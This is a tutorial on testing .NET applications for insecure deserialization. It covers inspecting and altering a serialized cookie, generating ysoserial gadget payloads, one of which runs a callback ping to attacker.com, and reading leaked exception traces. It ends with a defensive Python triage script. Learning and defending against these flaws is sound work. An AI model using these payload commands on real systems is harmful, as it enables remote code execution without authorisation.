Black Box Approach
Black Box Testing Examples:
- Identifying Input Points:
  - Example: During your assessment, you identify that the application uses a cookie called userData which appears to contain serialized data.
  - Action: Capture and inspect the cookie value. Prepare to test it with modified or malicious serialized data.
- Sending Malformed Data:
  - Example: Using Burp Suite, intercept a request containing the userData cookie:
      Cookie: userData=<base64 encoded serialized object>
  - Action: Modify the userData value to include malformed serialized data and observe the response for errors or crashes.
- Using Exploitation Tools:
  - Example: Generate a payload using ysoserial.net for a .NET application:
      ysoserial.net -g TypeConfuseDelegate -f Json.Net
  - Action: Inject this payload into the userData cookie and send the request. Monitor for successful execution or error messages indicating deserialization.
- Monitoring Responses:
  - Example: You receive a response with an error stack trace indicating a deserialization error:
      System.InvalidOperationException: There is an error in XML document
  - Action: Use this information to refine your payloads and pinpoint the exact deserialization vulnerability.
- Proxy and Intercept:
  - Example: Intercept and modify traffic using Burp Suite to insert malicious serialized data:
      POST /someEndpoint HTTP/1.1
      Host: vulnerableApp.com
      Content-Type: application/xml

      <userData>
        <ObjectType>ExploitType</ObjectType>
        <Data>malicious_payload</Data>
      </userData>
  - Action: Send the modified request and observe the application's behavior.
Practical Steps with Examples:
- Set Up Monitoring:
  - White Box: Add logging to the deserialization function:
      using System;
      using System.IO;
      using System.Xml.Serialization;

      public T Deserialize<T>(string xml)
      {
          try
          {
              XmlSerializer serializer = new XmlSerializer(typeof(T));
              using (StringReader reader = new StringReader(xml))
              {
                  return (T)serializer.Deserialize(reader);
              }
          }
          catch (Exception ex)
          {
              // Record the failure for later review, then rethrow so callers still see it.
              Logger.Log("Deserialization error: " + ex.Message);
              throw;
          }
      }
  - Black Box: Use Burp Suite to capture and analyze HTTP traffic:
      GET /someEndpoint HTTP/1.1
      Host: vulnerableApp.com
      Cookie: userData=<captured_base64_encoded_data>
- Generate and Test Payloads:
  - White Box: Modify code to test deserialization with different payloads:
      string testXml = "<MyObject><Property>test</Property></MyObject>";
      MyObject obj = Deserialize<MyObject>(testXml);
  - Black Box: Use ysoserial to generate payloads:
      ysoserial -o Pickle -p RCE "ping -c 1 attacker.com"
- Analyze Error Responses:
  - White Box: Review log files for deserialization errors:
      Deserialization error: InvalidOperationException: There is an error in XML document
  - Black Box: Inspect HTTP response for stack traces or error messages:
      HTTP/1.1 500 Internal Server Error
      Content-Type: text/html

      <html>
        <body>
          <h1>Server Error</h1>
          <p>System.InvalidOperationException: There is an error in XML document</p>
        </body>
      </html>
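As an added defender-side example (not code from the original page), the following Python pairs each captured request's userData cookie with its response, names the serialization format the cookie carries, and flags responses that leak a deserialization exception like the one above; it serves both the "Set Up Monitoring" and "Analyze Error Responses" steps. The request/response samples, the format-signature table and the error pattern are constructed for this example; the signatures are the documented leading bytes of .NET BinaryFormatter, Java serialization and pickle (protocol 2+) streams.

```python
import base64
import re
# Constructed (request, response) pairs modelled on the userData cookie and the 500 response
# in the text; nothing here was captured from a real system.
def b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode()
REQ = "GET /someEndpoint HTTP/1.1\r\nHost: vulnerableApp.com\r\nCookie: userData="
SAMPLE_TRAFFIC = [
    (REQ + b64(b"<MyObject><Property>test</Property></MyObject>"),
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body>ok</body></html>"),
    (REQ + b64(b'{"$type":"System.Object, mscorlib","Property":"x"}'),
     "HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n"
     "<p>System.InvalidOperationException: There is an error in XML document</p>"),
    (REQ + "a1b2c3d4", "HTTP/1.1 200 OK\r\n\r\n"),  # opaque session token, not serialized data
]
# Leading bytes of binary formats whose payloads name the types to instantiate.
FORMAT_MAGIC = [(b"\x00\x01\x00\x00\x00\xff\xff\xff\xff", "dotnet-binaryformatter"),
                (b"\xac\xed\x00\x05", "java-serialized"), (b"\x80", "python-pickle")]
ERROR_RE = re.compile(r"There is an error in XML document|SerializationException|Deserializ", re.I)
def cookie_value(request: str, name: str = "userData"):
    m = re.search(r"Cookie:[^\r\n]*\b" + re.escape(name) + r"=([^;\r\n]+)", request)
    return m.group(1) if m else None  # raw cookie value, or None when absent
def classify_payload(value: str) -> str:  # which serialization format the cookie carries
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return "not-base64"
    for magic, name in FORMAT_MAGIC:
        if raw.startswith(magic):
            return name
    text = raw.lstrip()
    if text.startswith(b"<"):
        return "xml"
    if text.startswith(b"{"):  # Json.Net acts on "$type" only when TypeNameHandling is enabled
        return "json-typed" if b'"$type"' in text else "json"
    return "unknown"
def is_deserialization_error(response: str) -> bool:  # 500 that leaks a (de)serialization exception
    return response.startswith("HTTP/1.1 500") and bool(ERROR_RE.search(response))
def triage(traffic):  # pair each request's userData cookie with its response and rate the finding
    findings = []
    for request, response in traffic:
        value = cookie_value(request)
        if value is None:
            continue
        fmt, errored = classify_payload(value), is_deserialization_error(response)
        if fmt in ("not-base64", "unknown") and not errored:
            continue  # opaque token: nothing deserialized, no error leaked
        high = errored or fmt not in ("xml", "json")  # formats that steer types rate high
        findings.append({"format": fmt, "error_leaked": errored, "severity": "high" if high else "low"})
    return findings
```

Run `triage(SAMPLE_TRAFFIC)` to see the XML cookie rated low and the type-carrying JSON cookie that produced the leaked exception rated high, while the opaque token is dropped.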